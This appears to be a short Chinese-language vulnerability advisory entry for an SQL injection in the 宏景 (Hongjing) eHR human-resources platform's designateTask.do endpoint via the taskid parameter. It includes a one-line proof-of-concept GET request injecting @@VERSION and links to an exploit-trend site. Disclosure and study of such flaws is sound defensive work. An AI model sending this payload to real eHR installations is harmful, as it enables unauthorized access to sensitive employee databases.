宏景eHR /performance/objectiveManage/designateTask.do SQL 注入漏洞

2026-04-17 宏景eHR PoC Public

Description

宏景eHR是由北京宏景世纪软件有限公司推出的一体化人力资源管理平台,涵盖组织管理、人事管理、薪酬管理、绩效管理、招聘管理、培训管理、考勤管理等核心功能模块,广泛应用于政府机关、企事业单位、医院、学校等组织中。该系统采用Java EE架构,支持多组织、多账簿、多币种的复杂业务场景,提供Web管理平台和移动端应用。宏景eHR的 /performance/objectiveManage/designateTask.do 接口存在SQL注入漏洞,攻击者可通过 taskid 参数构造恶意SQL语句,获取数据库敏感信息。

PoC

GET /performance/objectiveManage/designateTask.do?b_save&taskid=@@VERSION HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities